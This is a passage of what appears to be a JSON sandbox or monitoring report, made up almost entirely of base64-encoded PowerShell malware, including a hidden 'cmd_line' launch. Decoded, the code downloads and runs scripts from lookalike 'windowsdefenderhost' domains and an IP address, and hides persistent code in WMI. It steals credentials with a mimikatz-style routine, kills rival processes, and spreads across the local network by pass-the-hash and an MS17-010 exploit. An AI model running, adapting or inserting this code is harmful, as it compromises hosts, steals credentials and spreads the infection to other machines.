QBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="
+                                            ],
+                                            "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcA